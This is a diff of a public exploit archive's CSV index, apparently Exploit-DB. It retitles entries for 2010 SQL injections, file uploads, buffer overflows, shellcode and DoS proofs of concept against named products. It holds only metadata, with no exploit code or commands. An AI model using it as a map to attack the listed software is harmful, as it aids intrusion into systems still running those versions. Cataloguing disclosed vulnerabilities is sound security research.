- Web Administration Broken Access Control",2010-05-19,"Nahuel Grisolia",freebsd,webapps,0 12659,platforms/php/webapps/12659.txt,"DB[CMS] - (section.php) SQL Injection",2010-05-19,CoBRa_21,php,webapps,0 12660,platforms/hardware/webapps/12660.txt,"Palo Alto Network Vulnerability - Cross-Site Scripting",2010-05-19,"Jeromie Jackson",hardware,webapps,0 12661,platforms/php/webapps/12661.txt,"DBCart - (article.php) SQL Injection",2010-05-19,v3n0m,php,webapps,0 -12662,platforms/windows/local/12662.rb,"SyncBack Freeware 3.2.20.0",2010-05-19,Lincoln,windows,local,0 +12662,platforms/windows/local/12662.rb,"SyncBack Freeware 3.2.20.0 - Exploit",2010-05-19,Lincoln,windows,local,0 12663,platforms/windows/remote/12663.html,"CommuniCrypt Mail 1.16 - (ANSMTP.dll/AOSMTP.dll) ActiveX",2010-05-19,Lincoln,windows,remote,0 12664,platforms/asp/webapps/12664.txt,"Renista CMS - Exploit",2010-05-20,"Amir Afghanian",asp,webapps,0 12665,platforms/php/webapps/12665.pl,"IMEDIA - (index.php) SQL Injection",2010-05-20,kannibal615,php,webapps,0 12666,platforms/php/webapps/12666.txt,"DB[CMS] - (article.php) SQL Injection",2010-05-20,blackraptor,php,webapps,0 12667,platforms/php/webapps/12667.py,"SQL Injection Entry Level Content Management System (EL CMS)",2010-05-20,"vir0e5 ",php,webapps,0 -12671,platforms/php/webapps/12671.txt,"Powder Blue Design SQL Injection",2010-05-20,cyberlog,php,webapps,0 +12671,platforms/php/webapps/12671.txt,"Powder Blue Design - SQL Injection",2010-05-20,cyberlog,php,webapps,0 12672,platforms/asp/webapps/12672.txt,"Spaw Editor 1.0 & 2.0 - Remote File Upload",2010-05-20,Ma3sTr0-Dz,asp,webapps,0 12673,platforms/windows/remote/12673.txt,"ComponentOne VSFlexGrid 7 & 8 - 'Archive()' method Remote Buffer Overflow Exploit",2010-05-20,Ma3sTr0-Dz,windows,remote,0 12674,platforms/php/webapps/12674.txt,"webYourPhotos 6.05 - (index.php) Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0 @@ -11581,28 +11581,28 @@ id,file,description,date,author,platform,type,port 12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - (fckeditor) Arbitrary File Upload Exploit",2010-05-21,Ma3sTr0-Dz,php,webapps,0 12691,platforms/php/webapps/12691.txt,"Online Job Board - (Auth Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0 14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0 -12692,platforms/php/webapps/12692.txt,"TinyBrowser Remote File upload",2010-05-22,Ra3cH,php,webapps,0 +12692,platforms/php/webapps/12692.txt,"TinyBrowser - Remote File upload",2010-05-22,Ra3cH,php,webapps,0 12693,platforms/asp/webapps/12693.txt,"Asset Manager - Remote File upload",2010-05-22,Ra3cH,asp,webapps,0 -12694,platforms/php/webapps/12694.txt,"Tochin Ecommerce Multiple Remote",2010-05-22,cyberlog,php,webapps,0 -12695,platforms/php/webapps/12695.txt,"Azimut Technologie Admin Login Bypass",2010-05-22,Ra3cH,php,webapps,0 +12694,platforms/php/webapps/12694.txt,"Tochin Ecommerce - Multiple Remote Exploits",2010-05-22,cyberlog,php,webapps,0 +12695,platforms/php/webapps/12695.txt,"Azimut Technologie - Admin Login Bypass",2010-05-22,Ra3cH,php,webapps,0 12696,platforms/php/webapps/12696.txt,"E-commerce Group - (cat.php) SQL Injection",2010-05-22,"BLack Revenge",php,webapps,0 12697,platforms/php/webapps/12697.php,"hustoj - (fckeditor) Remote Arbitrary File Upload Exploit",2010-05-22,eidelweiss,php,webapps,0 12698,platforms/windows/dos/12698.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - 'PORT' Command Remote DoS",2010-05-22,Ma3sTr0-Dz,windows,dos,0 12699,platforms/php/webapps/12699.txt,"eWebEditor 1.x - (WYSIWYG) Remote File Upload",2010-05-22,Ma3sTr0-Dz,php,webapps,0 -12700,platforms/asp/webapps/12700.txt,"DotNetNuke Remote File upload",2010-05-22,"Ra3cH and Ma3sTr0-Dz",asp,webapps,0 +12700,platforms/asp/webapps/12700.txt,"DotNetNuke - Remote File upload",2010-05-22,"Ra3cH and Ma3sTr0-Dz",asp,webapps,0 12701,platforms/asp/webapps/12701.txt,"Rave Creations/UHM - (artists.asp) SQL Injection",2010-05-22,Ra3cH,asp,webapps,0 12702,platforms/php/webapps/12702.php,"ECShop - Search.php SQL Injection",2010-05-22,Jannock,php,webapps,0 12703,platforms/php/webapps/12703.txt,"Recipes Website 1.0 - SQL Injection",2010-05-22,Mr.ThieF,php,webapps,0 12704,platforms/windows/dos/12704.txt,"Media Player Classic 1.3.1774.0 - (.rm) Buffer Overflow PoC",2010-05-23,"sniper ip",windows,dos,0 -12706,platforms/php/webapps/12706.txt,"MMA Creative Design SQL Injection",2010-05-23,XroGuE,php,webapps,0 -12707,platforms/php/webapps/12707.txt,"runt-communications Design SQL Injection",2010-05-23,XroGuE,php,webapps,0 +12706,platforms/php/webapps/12706.txt,"MMA Creative Design - SQL Injection",2010-05-23,XroGuE,php,webapps,0 +12707,platforms/php/webapps/12707.txt,"runt-communications Design - SQL Injection",2010-05-23,XroGuE,php,webapps,0 12709,platforms/php/webapps/12709.txt,"webperformance Ecommerce SQL",2010-05-23,cyberlog,php,webapps,0 12710,platforms/windows/local/12710.c,"Kingsoft WebShield KAVSafe.sys 2010.4.14.609 (2010.5.23) - Kernel Mode Local Privilege Escalation",2010-05-23,"Xuanyuan Smart",windows,local,0 12711,platforms/php/webapps/12711.txt,"BBMedia Design's - SQL Injection",2010-05-23,XroGuE,php,webapps,0 12712,platforms/php/webapps/12712.txt,"goffgrafix - Design's SQL Injection",2010-05-23,XroGuE,php,webapps,0 12713,platforms/php/webapps/12713.txt,"eCreo - SQL Injection",2010-05-23,cyberlog,php,webapps,0 12714,platforms/php/webapps/12714.txt,"infoware - SQL Injection",2010-05-24,cyberlog,php,webapps,0 -12715,platforms/multiple/webapps/12715.pl,"e107 Code Exec",2010-05-24,McFly,multiple,webapps,0 +12715,platforms/multiple/webapps/12715.pl,"e107 - Code Exec",2010-05-24,McFly,multiple,webapps,0 12716,platforms/php/webapps/12716.txt,"runt-communications Design - (property_more.php) SQL Injection",2010-05-24,CoBRa_21,php,webapps,0 12717,platforms/php/webapps/12717.txt,"Telia Web Design - (index.php) SQL Injection",2010-05-24,CoBRa_21,php,webapps,0 12718,platforms/php/webapps/12718.txt,"BBMedia Design's - (news_more.php) SQL Injection",2010-05-24,gendenk,php,webapps,0 @@ -11617,11 +11617,11 @@ id,file,description,date,author,platform,type,port 12727,platforms/php/webapps/12727.txt,"LiSK CMS 4.4 - SQL Injection",2010-05-24,"High-Tech Bridge SA",php,webapps,0 12728,platforms/windows/webapps/12728.txt,"Microsoft Outlook Web Access (OWA) 8.2.254.0 - Information Disclosure",2010-05-24,"Praveen Darshanam",windows,webapps,0 12729,platforms/php/webapps/12729.txt,"Blox CMS - SQL Injection",2010-05-24,CoBRa_21,php,webapps,0 -12730,platforms/multiple/webapps/12730.txt,"ProWeb Design SQL Injection",2010-05-24,cyberlog,multiple,webapps,0 +12730,platforms/multiple/webapps/12730.txt,"ProWeb Design - SQL Injection",2010-05-24,cyberlog,multiple,webapps,0 12731,platforms/php/webapps/12731.txt,"Webloader 8 - SQL Injection",2010-05-24,ByEge,php,webapps,0 12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities",2010-05-24,eidelweiss,php,webapps,0 12734,platforms/asp/webapps/12734.txt,"Blaze Apps - Multiple Vulnerabilities",2010-05-24,"AmnPardaz ",asp,webapps,0 -12735,platforms/php/webapps/12735.txt,"NITRO Web Gallery SQL Injection",2010-05-25,cyberlog,php,webapps,0 +12735,platforms/php/webapps/12735.txt,"NITRO Web Gallery - SQL Injection",2010-05-25,cyberlog,php,webapps,0 12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks Inc - (news.php) SQL Injection",2010-05-25,"Dr.SiLnT HilL",php,webapps,0 12737,platforms/php/webapps/12737.txt,"Simpel Side - (index2.php) SQL Injection",2010-05-25,MN9,php,webapps,0 12740,platforms/windows/dos/12740.py,"Webby Webserver - PoC SEH control (0Day)",2010-05-25,m-1-k-3,windows,dos,0 @@ -11648,11 +11648,11 @@ id,file,description,date,author,platform,type,port 12769,platforms/php/webapps/12769.txt,"Joomla Component MediQnA 1.1 - LFI",2010-05-27,kaMtiEz,php,webapps,0 12770,platforms/php/webapps/12770.txt,"toronja CMS - SQL Injection",2010-05-27,cyberlog,php,webapps,0 12771,platforms/php/webapps/12771.txt,"Toronja CMS - HTML/XSS Injection",2010-05-27,CoBRa_21,php,webapps,0 -12772,platforms/php/webapps/12772.txt,"Realtor WebSite System E-Commerce SQL Injection",2010-05-27,cyberlog,php,webapps,0 +12772,platforms/php/webapps/12772.txt,"Realtor WebSite System E-Commerce - SQL Injection",2010-05-27,cyberlog,php,webapps,0 12773,platforms/php/webapps/12773.txt,"Realtor Real Estate Agent - (idproperty) SQL Injection",2010-05-28,v3n0m,php,webapps,0 12774,platforms/windows/dos/12774.py,"HomeFTP Server r1.10.3 - (build 144) Denial of Service",2010-05-28,Dr_IDE,windows,dos,0 12775,platforms/multiple/dos/12775.py,"VLC Media Player 1.0.6 - (.avi) Media File Crash PoC",2010-05-28,Dr_IDE,multiple,dos,0 -12776,platforms/php/webapps/12776.txt,"Realtor WebSite System E-Commerce idfestival SQL Injection",2010-05-28,CoBRa_21,php,webapps,0 +12776,platforms/php/webapps/12776.txt,"Realtor WebSite System E-Commerce - idfestival SQL Injection",2010-05-28,CoBRa_21,php,webapps,0 12777,platforms/php/webapps/12777.txt,"Realtor Real Estate Agent - (news.php) SQL Injection",2010-05-28,v3n0m,php,webapps,0 12779,platforms/php/webapps/12779.txt,"Joomla Component My Car - Multiple Vulnerabilities",2010-05-28,Valentin,php,webapps,0 12780,platforms/php/webapps/12780.txt,"Joomla Component BF Quiz - SQL Injection",2010-05-28,Valentin,php,webapps,0 @@ -11676,7 +11676,7 @@ id,file,description,date,author,platform,type,port 12805,platforms/php/webapps/12805.txt,"Zeeways Script - Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0 12806,platforms/php/webapps/12806.txt,"CMScout - (XSS/HTML Injection) Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0 12807,platforms/php/webapps/12807.txt,"Creato Script - SQL Injection",2010-05-30,Mr.P3rfekT,php,webapps,0 -12808,platforms/php/webapps/12808.txt,"PTC Site's RCE/XSS",2010-05-30,CrazyMember,php,webapps,0 +12808,platforms/php/webapps/12808.txt,"PTC Site's - RCE/XSS",2010-05-30,CrazyMember,php,webapps,0 12809,platforms/php/webapps/12809.txt,"Symphony CMS - Local File Inclusion",2010-05-30,AntiSecurity,php,webapps,0 12811,platforms/php/webapps/12811.txt,"Oscommerce Online Merchant 2.2 - Remote File Upload",2010-05-30,MasterGipy,php,webapps,0 12812,platforms/php/webapps/12812.txt,"Joomla com_quran - SQL Injection",2010-05-30,r3m1ck,php,webapps,0 @@ -11690,7 +11690,7 @@ id,file,description,date,author,platform,type,port 12820,platforms/php/webapps/12820.txt,"Visitor Logger - (banned.php) Remote File Inclusion",2010-05-31,bd0rk,php,webapps,0 12821,platforms/windows/local/12821.py,"Mediacoder 0.7.3.4672 - SEH Exploit",2010-05-31,Stoke,windows,local,0 12822,platforms/php/webapps/12822.txt,"Joomla Component com_jsjobs - SQL Injection",2010-05-31,d0lc3,php,webapps,0 -12823,platforms/php/webapps/12823.txt,"musicbox SQL Injection",2010-05-31,titanichacker,php,webapps,0 +12823,platforms/php/webapps/12823.txt,"musicbox - SQL Injection",2010-05-31,titanichacker,php,webapps,0 12833,platforms/asp/webapps/12833.txt,"Patient folder (THEME ASP) - SQL Injection",2010-05-31,"SA H4x0r",asp,webapps,0 12834,platforms/windows/remote/12834.py,"XFTP 3.0 Build 0239 - Long filename Buffer Overflow",2010-06-01,sinn3r,windows,remote,0 12839,platforms/php/webapps/12839.txt,"Hexjector 1.0.7.2 - Persistent XSS",2010-06-01,hexon,php,webapps,0 @@ -11698,7 +11698,7 @@ id,file,description,date,author,platform,type,port 12841,platforms/asp/webapps/12841.txt,"Ticimax E-Ticaret - SQL Injection",2010-06-01,Neuromancer,asp,webapps,0 12842,platforms/php/webapps/12842.txt,"Joomla Component ChronoConnectivity (com_chronoconnectivity) - Blind SQL Injection",2010-06-02,_mlk_,php,webapps,0 12843,platforms/php/webapps/12843.txt,"Joomla Component ChronoForms (com_chronocontact) - Blind SQL Injection",2010-06-02,_mlk_,php,webapps,0 -12845,platforms/php/webapps/12845.txt,"Vastal I-Tech SQL Injection",2010-06-02,HELLBOY,php,webapps,0 +12845,platforms/php/webapps/12845.txt,"Vastal I-Tech - SQL Injection",2010-06-02,HELLBOY,php,webapps,0 12848,platforms/php/webapps/12848.txt,"SIMM Management System (SMS) - Local File Inclusion",2010-06-02,AntiSecurity,php,webapps,0 12849,platforms/php/webapps/12849.txt,"slogan design Script - SQL Injection",2010-06-03,Mr.P3rfekT,php,webapps,0 12850,platforms/php/webapps/12850.txt,"Member ID The Fish Index PHP SQL Injection",2010-06-03,v4lc0m87,php,webapps,0 @@ -11710,7 +11710,7 @@ id,file,description,date,author,platform,type,port 12858,platforms/php/webapps/12858.txt,"Article Management System 2.1.2 - Reinstall",2010-06-03,indoushka,php,webapps,0 12859,platforms/php/webapps/12859.txt,"Advneced Management For Services Sites - (File Disclosure) Vulnerabilities",2010-06-03,indoushka,php,webapps,0 12861,platforms/php/webapps/12861.txt,"PHP SETI@home Web monitor - (phpsetimon) RFI / LFI",2010-06-03,eidelweiss,php,webapps,0 -12865,platforms/hardware/remote/12865.txt,"Motorola SURFBoard Cable Modem Directory Traversal",2010-06-03,"S2 Crew",hardware,remote,0 +12865,platforms/hardware/remote/12865.txt,"Motorola SURFBoard Cable Modem - Directory Traversal",2010-06-03,"S2 Crew",hardware,remote,0 12866,platforms/php/webapps/12866.txt,"K9 Kreativity Design - (pages.php) SQL Injection",2010-06-03,Newbie_Campuz,php,webapps,0 12867,platforms/php/webapps/12867.txt,"clickartweb Design - SQL Injection",2010-06-03,cyberlog,php,webapps,0 12868,platforms/php/webapps/12868.txt,"Joomla Component com_lead - SQL Injection",2010-06-03,ByEge,php,webapps,0 @@ -12112,9 +12112,9 @@ id,file,description,date,author,platform,type,port 13748,platforms/php/webapps/13748.txt,"Joomla Component com_annonces - Upload",2010-06-06,Sid3^effects,php,webapps,0 13749,platforms/php/webapps/13749.txt,"idevspot Text ads 2.08 - SQLi",2010-06-06,Sid3^effects,php,webapps,0 13750,platforms/php/webapps/13750.txt,"WebBiblio Subject Gateway System - LFI",2010-06-06,AntiSecurity,php,webapps,0 -13751,platforms/php/webapps/13751.txt,"greeting card Remote Upload",2010-06-06,Mr.Benladen,php,webapps,0 +13751,platforms/php/webapps/13751.txt,"greeting card - Remote Upload",2010-06-06,Mr.Benladen,php,webapps,0 13752,platforms/php/webapps/13752.txt,"reVou Twitter Clone 2.0 Beta - SQL Injection / XSS",2010-06-06,Sid3^effects,php,webapps,0 -13754,platforms/multiple/webapps/13754.txt,"JForum 2.1.8 bookmarks CSRF / XSS",2010-06-07,"Adam Baldwin",multiple,webapps,0 +13754,platforms/multiple/webapps/13754.txt,"JForum 2.1.8 bookmarks - CSRF / XSS",2010-06-07,"Adam Baldwin",multiple,webapps,0 13756,platforms/windows/local/13756.py,"VUPlayer 2.49 - (.m3u) Universal Buffer Overflow Exploit (DEP bypass)",2010-06-07,mr_me,windows,local,0 13760,platforms/windows/local/13760.py,"Audio Converter 8.1 - Stack Buffer Overflow PoC Exploit (0Day)",2010-06-07,sud0,windows,local,0 13761,platforms/windows/local/13761.pl,"Easy CD-DA Recorder 2007 - SEH Buffer Overflow",2010-06-07,chap0,windows,local,0 @@ -12126,21 +12126,21 @@ id,file,description,date,author,platform,type,port 13769,platforms/php/webapps/13769.txt,"CafeEngine CMS 2.3 - SQLI",2010-06-08,Sid3^effects,php,webapps,0 13770,platforms/php/webapps/13770.txt,"Hotel / Resort Site Script with OnLine Reservation System - SQL Injection",2010-06-08,"L0rd CrusAd3r",php,webapps,0 13771,platforms/php/webapps/13771.txt,"EMO Realty Manager - SQLi",2010-06-08,"L0rd CrusAd3r",php,webapps,0 -13772,platforms/php/webapps/13772.txt,"Rayzz Photoz Upload",2010-06-08,Sid3^effects,php,webapps,0 -13773,platforms/php/webapps/13773.txt,"Holiday Travel Portal Upload",2010-06-08,Sid3^effects,php,webapps,0 -13774,platforms/hardware/dos/13774.pl,"Motorola SB5101 Hax0rware Rajko HTTPD Remote Exploit PoC",2010-06-08,"Dillon Beresford",hardware,dos,80 -13775,platforms/hardware/dos/13775.pl,"Motorola SB5101 Hax0rware Event Reset Remote Overflow",2010-06-08,"Dillon Beresford",hardware,dos,80 +13772,platforms/php/webapps/13772.txt,"Rayzz Photoz - Upload",2010-06-08,Sid3^effects,php,webapps,0 +13773,platforms/php/webapps/13773.txt,"Holiday Travel Portal - Upload",2010-06-08,Sid3^effects,php,webapps,0 +13774,platforms/hardware/dos/13774.pl,"Motorola SB5101 Hax0rware Rajko HTTPD - Remote Exploit PoC",2010-06-08,"Dillon Beresford",hardware,dos,80 +13775,platforms/hardware/dos/13775.pl,"Motorola SB5101 - Hax0rware Event Reset Remote Overflow",2010-06-08,"Dillon Beresford",hardware,dos,80 13776,platforms/php/webapps/13776.txt,"Phreebooks 2.0 - Multiple Permanent Cross-Site Scripting",2010-06-08,"Gustavo Sorondo",php,webapps,0 13777,platforms/php/webapps/13777.txt,"Phreebooks 2.0 - Local File Inclusion",2010-06-08,"Gustavo Sorondo",php,webapps,0 13778,platforms/php/webapps/13778.txt,"Phreebooks 2.0 - Directory Traversal",2010-06-08,"Gustavo Sorondo",php,webapps,0 13779,platforms/php/webapps/13779.txt,"Pre Web Host - SQL Injection",2010-06-08,Mr.Benladen,php,webapps,0 13781,platforms/php/webapps/13781.txt,"phplist 2.8.11 - SQL Injection",2010-06-08,d3v1l,php,webapps,0 -13782,platforms/php/webapps/13782.txt,"Image Store Remote file Upload",2010-06-08,Mr.FireStormm,php,webapps,0 +13782,platforms/php/webapps/13782.txt,"Image Store - Remote file Upload",2010-06-08,Mr.FireStormm,php,webapps,0 13783,platforms/php/webapps/13783.txt,"GREEZLE - Global Real Estate Agent Site Auth SQL Injection",2010-06-09,"L0rd CrusAd3r",php,webapps,0 13784,platforms/php/webapps/13784.txt,"HauntmAx CMS Haunted House - Directory Listing / SQL Injection",2010-06-09,Sid3^effects,php,webapps,0 13785,platforms/php/webapps/13785.txt,"eLms Pro - SQLi / XSS",2010-06-09,Sid3^effects,php,webapps,0 13786,platforms/php/webapps/13786.txt,"PGAUTOPro - SQLi / XSS",2010-06-09,Sid3^effects,php,webapps,0 -13787,platforms/multiple/remote/13787.txt,"Adobe Flash and Reader - Exploit PoC (0Day)",2010-06-09,Unknown,multiple,remote,0 +13787,platforms/multiple/remote/13787.txt,"Adobe Flash and Reader - PoC (0Day)",2010-06-09,Unknown,multiple,remote,0 13788,platforms/asp/webapps/13788.txt,"Web Wiz Forums 9.68 - SQLi",2010-06-09,Sid3^effects,asp,webapps,0 13789,platforms/asp/webapps/13789.txt,"Virtual Real Estate Manager 3.5 - SQLi",2010-06-09,Sid3^effects,asp,webapps,0 14294,platforms/php/webapps/14294.txt,"sphider 1.3.5 - Remote File Inclusion",2010-07-09,Li0n-PaL,php,webapps,0 @@ -12168,7 +12168,7 @@ id,file,description,date,author,platform,type,port 13808,platforms/windows/remote/13808.txt,"Microsoft Windows Help Centre Handles - Malformed Escape Sequences Incorrectly",2010-06-10,"Tavis Ormandy",windows,remote,0 13810,platforms/php/webapps/13810.php,"AWCM CMS - Local File Inclusion",2010-06-10,SwEET-DeViL,php,webapps,0 13812,platforms/php/webapps/13812.txt,"SchoolMation 2.3 - SQLi / XSS",2010-06-10,Sid3^effects,php,webapps,0 -13813,platforms/php/webapps/13813.html,"Store Locator Remote Add Admin Exploit CSRF",2010-06-10,JaMbA,php,webapps,0 +13813,platforms/php/webapps/13813.html,"Store Locator - Remote Add Admin Exploit CSRF",2010-06-10,JaMbA,php,webapps,0 13814,platforms/asp/webapps/13814.txt,"Pars Design CMS - Arbitrary File Upload",2010-06-10,Securitylab.ir,asp,webapps,0 13815,platforms/asp/webapps/13815.pl,"Netvolution CMS 2.x - SQL Injection Exploit Script",2010-06-10,"amquen and krumel",asp,webapps,0 13816,platforms/php/webapps/13816.txt,"Miniweb 2.0 Business Portal and Social Networking Platform - SQL Injection",2010-06-10,"L0rd CrusAd3r",php,webapps,0 @@ -12185,7 +12185,7 @@ id,file,description,date,author,platform,type,port 13828,platforms/windows/shellcode/13828.c,"Windows - MessageBoxA Shellcode (238 bytes)",2010-06-11,RubberDuck,windows,shellcode,0 13829,platforms/php/webapps/13829.txt,"Site to Store Automobile - Motorcycle Boat SQL Injection",2010-06-11,"L0rd CrusAd3r",php,webapps,0 13830,platforms/php/webapps/13830.txt,"DaLogin - Multiple Vulnerabilities",2010-06-11,hc0,php,webapps,0 -13831,platforms/php/webapps/13831.txt,"Full Site for Restaurant SQL Injection",2010-06-11,"L0rd CrusAd3r",php,webapps,0 +13831,platforms/php/webapps/13831.txt,"Full Site for Restaurant - SQL Injection",2010-06-11,"L0rd CrusAd3r",php,webapps,0 13832,platforms/php/webapps/13832.txt,"ardeacore 2.2 - Remote File Inclusion",2010-06-11,"cr4wl3r ",php,webapps,0 13833,platforms/php/webapps/13833.txt,"Parallels System Automation (PSA) - Local File Inclusion",2010-06-11,"Pouya Daneshmand",php,webapps,0 13834,platforms/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 - ActiveX with DEP bypass",2010-06-11,Lincoln,windows,remote,0 @@ -12193,9 +12193,9 @@ id,file,description,date,author,platform,type,port 13836,platforms/windows/dos/13836.py,"Solarwinds 10.4.0.13 - Denial of Service",2010-06-12,Nullthreat,windows,dos,0 13837,platforms/windows/dos/13837.pl,"Media Player Classic 1.3.1774.0 - (mpcpl) Local DoS (PoC) (0Day)",2010-06-12,R3d-D3V!L,windows,dos,0 13838,platforms/windows/dos/13838.pl,"CP3 Studio PC Version - Denial of Service",2010-06-12,chap0,windows,dos,0 -13840,platforms/asp/webapps/13840.txt,"VU Case Manager Authentication Bypass",2010-06-12,"L0rd CrusAd3r",asp,webapps,0 -13841,platforms/asp/webapps/13841.txt,"VU Mass Mailer Authentication Bypass",2010-06-12,"L0rd CrusAd3r",asp,webapps,0 -13842,platforms/asp/webapps/13842.txt,"VU Web Visitor Analyst Authentication Bypass",2010-06-12,"L0rd CrusAd3r",asp,webapps,0 +13840,platforms/asp/webapps/13840.txt,"VU Case Manager - Authentication Bypass",2010-06-12,"L0rd CrusAd3r",asp,webapps,0 +13841,platforms/asp/webapps/13841.txt,"VU Mass Mailer - Authentication Bypass",2010-06-12,"L0rd CrusAd3r",asp,webapps,0 +13842,platforms/asp/webapps/13842.txt,"VU Web Visitor Analyst - Authentication Bypass",2010-06-12,"L0rd CrusAd3r",asp,webapps,0 13843,platforms/asp/webapps/13843.txt,"BrightSuite Groupware - SQL Injection",2010-06-12,"L0rd CrusAd3r",asp,webapps,0 13844,platforms/php/webapps/13844.pl,"Collabtive 0.6.3 - Multiple Vulnerabilities",2010-06-12,DNX,php,webapps,0 13845,platforms/php/webapps/13845.txt,"Yamamah (news) - SQL Injection / Source Code Disclosure",2010-06-12,anT!-Tr0J4n,php,webapps,0 @@ -12203,7 +12203,7 @@ id,file,description,date,author,platform,type,port 13847,platforms/php/webapps/13847.txt,"phpplanner - XSS / SQL",2010-06-12,anT!-Tr0J4n,php,webapps,0 13848,platforms/php/webapps/13848.txt,"Infront - SQL Injection",2010-06-12,TheMaStEr,php,webapps,0 13849,platforms/php/webapps/13849.txt,"Yamamah 1.0 - SQL Injection",2010-06-12,TheMaStEr,php,webapps,0 -13850,platforms/multiple/remote/13850.pl,"Litespeed Technologies Web Server Remote Poison null byte Exploit",2010-06-13,kingcope,multiple,remote,80 +13850,platforms/multiple/remote/13850.pl,"Litespeed Technologies - Web Server Remote Poison null byte Exploit",2010-06-13,kingcope,multiple,remote,80 13852,platforms/php/webapps/13852.txt,"phpplanner PHP Planner 0.4 - Multiple Vulnerabilities",2010-06-13,"cp77fk4r ",php,webapps,0 13853,platforms/linux/remote/13853.pl,"Unreal IRCD 3.2.8.1 - Remote Downloader/Execute Trojan",2010-06-13,anonymous,linux,remote,0 13854,platforms/php/webapps/13854.txt,"UTStats - XSS / SQL Injection / Full path disclosure",2010-06-13,"LuM Member",php,webapps,0 @@ -12213,7 +12213,7 @@ id,file,description,date,author,platform,type,port 13858,platforms/php/webapps/13858.txt,"Eyeland Studio Inc. - (game.php) SQL Injection",2010-06-13,CoBRa_21,php,webapps,0 13859,platforms/asp/webapps/13859.txt,"Digital Interchange Document Library - SQL Injection",2010-06-13,"L0rd CrusAd3r",asp,webapps,0 13860,platforms/asp/webapps/13860.txt,"Digital Interchange Calendar - SQL Injection",2010-06-13,"L0rd CrusAd3r",asp,webapps,0 -13861,platforms/asp/webapps/13861.txt,"Real-time ASP Calendar SQL Injection",2010-06-13,"L0rd CrusAd3r",asp,webapps,0 +13861,platforms/asp/webapps/13861.txt,"Real-time ASP Calendar - SQL Injection",2010-06-13,"L0rd CrusAd3r",asp,webapps,0 13862,platforms/php/webapps/13862.txt,"Pre Classified Listing - SQL",2010-06-13,"L0rd CrusAd3r",php,webapps,0 13863,platforms/php/webapps/13863.txt,"Lyrics Script - SQL Injection / Cross-Site Scripting",2010-06-14,Valentin,php,webapps,0 13864,platforms/php/webapps/13864.txt,"Membership Site Script - SQL Injection",2010-06-14,Valentin,php,webapps,0 @@ -12226,31 +12226,31 @@ id,file,description,date,author,platform,type,port 13875,platforms/solaris_x86/shellcode/13875.c,"Solaris/x86 - Sync() & reboot() & exit(0) shellcode (48 bytes)",2010-06-14,"Jonathan Salwan",solaris_x86,shellcode,0 13876,platforms/windows/dos/13876.py,"File Sharing Wizard 1.5.0 - Buffer Overflow PoC",2010-06-15,m-1-k-3,windows,dos,0 13880,platforms/asp/webapps/13880.txt,"Smart ASP Survey - XSS / SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0 -13881,platforms/php/webapps/13881.txt,"Pre Job Board Pro SQL Injection Auth Bypass",2010-06-15,"L0rd CrusAd3r",php,webapps,0 +13881,platforms/php/webapps/13881.txt,"Pre Job Board Pro - SQL Injection Auth Bypass",2010-06-15,"L0rd CrusAd3r",php,webapps,0 13882,platforms/asp/webapps/13882.txt,"SAS Hotel Management System - user_login.asp SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0 13883,platforms/asp/webapps/13883.txt,"Business Classified Listing - SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0 13884,platforms/asp/webapps/13884.txt,"Restaurant Listing with Online Ordering SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0 13885,platforms/asp/webapps/13885.txt,"Acuity CMS 2.7.1 - SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0 -13886,platforms/asp/webapps/13886.txt,"IISWorks FileMan fileman.mdb Remote User Database Disclosure",2010-06-15,j0fer,asp,webapps,0 +13886,platforms/asp/webapps/13886.txt,"IISWorks FileMan - fileman.mdb Remote User Database Disclosure",2010-06-15,j0fer,asp,webapps,0 13887,platforms/windows/dos/13887.c,"Winplot 2010 - Buffer Overflow PoC",2010-06-15,"fl0 fl0w",windows,dos,0 13888,platforms/windows/dos/13888.c,"SasCam 2.6.5 - Remote HTTP Server Crash",2010-06-15,"fl0 fl0w",windows,dos,0 13889,platforms/php/webapps/13889.txt,"Nakid CMS 0.5.2 - Remote File Inclusion Exploit",2010-06-16,sh00t0ut,php,webapps,0 13890,platforms/php/webapps/13890.txt,"EZPX Photoblog 1.2 beta - Remote File Inclusion Exploit",2010-06-16,sh00t0ut,php,webapps,0 13891,platforms/asp/webapps/13891.html,"AspTR EXtended - CSRF Bug",2010-06-16,FreWaL,asp,webapps,0 -13892,platforms/php/webapps/13892.txt,"PHPAuctionSystem Upload",2010-06-16,Sid3^effects,php,webapps,0 +13892,platforms/php/webapps/13892.txt,"PHPAuctionSystem - Upload",2010-06-16,Sid3^effects,php,webapps,0 13893,platforms/php/webapps/13893.txt,"Nakid CMS 0.5.2 - (fckeditor) Remote Arbitrary File Upload Exploit",2010-06-16,eidelweiss,php,webapps,0 13894,platforms/php/webapps/13894.txt,"2DayBiz Online Classified System - SQLi / XSS",2010-06-16,Sid3^effects,php,webapps,0 13895,platforms/windows/local/13895.py,"Rosoft Audio Converter 4.4.4 - Buffer Overflow",2010-06-16,blake,windows,local,0 -13897,platforms/php/webapps/13897.txt,"Real Estate SQL Injection",2010-06-16,"L0rd CrusAd3r",php,webapps,0 +13897,platforms/php/webapps/13897.txt,"Real Estate - SQL Injection",2010-06-16,"L0rd CrusAd3r",php,webapps,0 13898,platforms/php/webapps/13898.pl,"DMSEasy 0.9.7 - (fckeditor) Arbitrary File Upload",2010-06-17,sh00t0ut,php,webapps,0 13899,platforms/php/webapps/13899.txt,"Pithcms 0.9.5 - Local File Inclusion",2010-06-17,sh00t0ut,php,webapps,0 -13900,platforms/php/webapps/13900.txt,"Easy Travel Portal SQL",2010-06-17,"L0rd CrusAd3r",php,webapps,0 -13901,platforms/php/webapps/13901.txt,"PenPals Authentication Bypass",2010-06-17,"L0rd CrusAd3r",php,webapps,0 